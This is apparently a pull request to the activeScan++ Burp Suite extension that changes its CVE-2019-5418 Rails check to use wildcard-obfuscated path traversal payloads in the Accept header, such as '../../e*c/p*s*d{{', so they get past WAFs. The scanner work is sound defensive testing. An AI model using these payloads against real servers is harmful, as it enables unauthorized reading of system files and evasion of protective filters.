### PR TITLE
Updated Rails payload to WAF bypass payload

### DIFF
--- a/activeScan++.py
+++ b/activeScan++.py
@@ -188,7 +188,7 @@ class PerRequestScans(IScannerCheck):
         if '127.0.0.1' in safe_bytes_to_string(basePair.getResponse()):
             return
 
-        (ignore, req) = setHeader(basePair.getRequest(), 'Accept', '../../../../../../../../../../../../../etc/hosts{{', True)
+        (ignore, req) = setHeader(basePair.getRequest(), 'Accept', '../../../../../../../../../../../../../e*c/h*s*s{{', True)
         attack = callbacks.makeHttpRequest(basePair.getHttpService(), req)
         if '127.0.0.1' in safe_bytes_to_string(attack.getResponse()):
             return [CustomScanIssue(basePair.getHttpService(), helpers.analyzeRequest(basePair).getUrl(),


### PR DESCRIPTION
Closes issue #15 and #16  --

Okay. Using the following payloads:

```
../../../../../../e*c/p*s*d{{
../../../../../../e*c/h*s*s{{
```

With https://github.com/takeokunn/CVE-2019-5418

We get the following:

![image](https://user-images.githubusercontent.com/5241936/55685588-6fae2f00-599b-11e9-8d08-5da0676cc005.png)

I've modified the script and used it w/ Burp:

![image](https://user-images.githubusercontent.com/5241936/55686067-5c519280-59a0-11e9-89b2-9ae5e6229249.png)

![image](https://user-images.githubusercontent.com/5241936/55686069-61aedd00-59a0-11e9-9db8-16092cf19e00.png)

Credit for payloads: https://blog.pentesterlab.com/cve-2019-5418-on-waf-bypass-and-caching-10e93f9a1981